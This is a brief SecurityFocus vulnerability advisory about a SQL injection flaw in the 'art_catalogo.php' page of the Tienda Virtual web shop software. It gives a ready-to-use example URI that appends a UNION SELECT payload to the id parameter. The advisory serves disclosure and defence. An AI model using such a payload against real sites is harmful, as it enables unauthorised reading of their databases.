Tienda Virtual 'art_catalogo.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[path]/art_catalogo.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11--+


 

Privacy Statement
Copyright 2010, SecurityFocus